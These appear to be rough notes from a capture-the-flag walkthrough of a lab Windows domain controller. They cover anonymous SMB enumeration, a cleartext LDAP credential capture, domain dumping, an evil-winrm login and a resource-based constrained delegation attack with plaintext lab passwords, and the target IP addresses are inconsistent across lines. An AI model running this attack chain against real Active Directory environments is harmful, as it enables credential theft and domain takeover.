SMB 10.10.11.174 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
┌──(root㉿kali)-[~/Desktop/Support]
└─# smbclient -L 10.10.11.174 -U ""
Password for [WORKGROUP\]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
┌──(root㉿kali)-[~/Desktop/Support]
└─# smbclient -N //10.10.11.174/support-tools
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 21 01:01:06 2022
.. D 0 Sat May 28 19:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 19:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 19:19:55 2022
putty.exe A 1273576 Sat May 28 19:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 19:19:31 2022
UserInfo.exe.zip A 277499 Thu Jul 21 01:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 19:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 19:19:43 2022


support\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
ldapsearch -x -H ldap://10.10.10.161 -b "dc=support,dc=htb"
[LDAP] Attempting to parse an old simple Bind request.
[LDAP] Cleartext Client : 192.168.77.131
[LDAP] Cleartext Username : support\ldap
[LDAP] Cleartext Password : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
[Analyze mode: Browser] Datagram Request from IP: 192.168.77.1 hostname: DESKTOP-9GV6IKT via the: File Server to: WORKGROUP. Service: Local Master Browser
ldapdomaindump 'ldap://support.htb' -u 'support.htb\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
Found password-like strings inside domain_users.json, for username ‘support’

evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb
Use BloodHound

addcomputer.py -computer-name 'evil$' -computer-pass 'password' -dc-ip 10.129.227.255 'support.htb/support:Ironside47pleasure40Watchful'
rbcd.py -delegate-from 'evil$' -delegate-to 'dc$' -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'